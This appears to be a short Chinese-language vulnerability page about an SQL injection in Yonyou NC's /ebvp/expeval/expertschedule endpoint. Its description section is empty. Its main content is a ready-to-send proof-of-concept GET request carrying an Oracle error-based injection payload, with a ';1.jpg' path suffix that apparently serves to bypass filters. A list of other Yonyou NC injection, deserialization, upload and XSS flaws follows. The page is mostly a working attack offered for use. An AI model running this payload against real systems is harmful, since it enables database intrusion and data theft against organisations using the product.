用友NC /expertschedule 路径存在SQL注入漏洞

漏洞描述

PoC代码

GET /ebvp/expeval/expertschedule;1.jpg?pkevalset=1%27+AND+6248%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28120%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%286248%3D6248%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+QtwN HTTP/1.1

相关漏洞推荐

• 用友NC及NC Cloud系统 /uapws/service/nc.itf.bap.service.IBapIOService getBapTableDatas SQL 注入漏洞
• 用友NC /portal/pt/portalcombo/importCombo XML 外部实体注入漏洞
• 用友NC存在 oncelogin/getAuth SQL注入漏洞
• 用友NC /portal/pt/oacoSchedulerEvents/uncancelEvent SQL 注入漏洞
• 用友NC /ebvp/register/qrySubPurchaseOrgByParentPk SQL 注入漏洞
• 用友 NC Cloud /ncchr/pm/obj/queryPsnInfo SQL 注入漏洞
• 用友NC /portal/pt/infopathimport/importExcelTemplate pageId 文件上传漏洞
• 用友NC OAUserQryServlet 反序列化漏洞
• 用友NC OAUserAuthenticationServlet 反序列化漏洞
• 用友NC ContactsQueryServiceServlet 反序列化漏洞
• POC 用友NC UserSynchronizationServlet 反序列化漏洞
• 用友NC ContactsFuzzySearchServlet 反序列化漏洞
• 用友 NC /portal/pt/nc5x/fwd 存在跨站点脚本攻击漏洞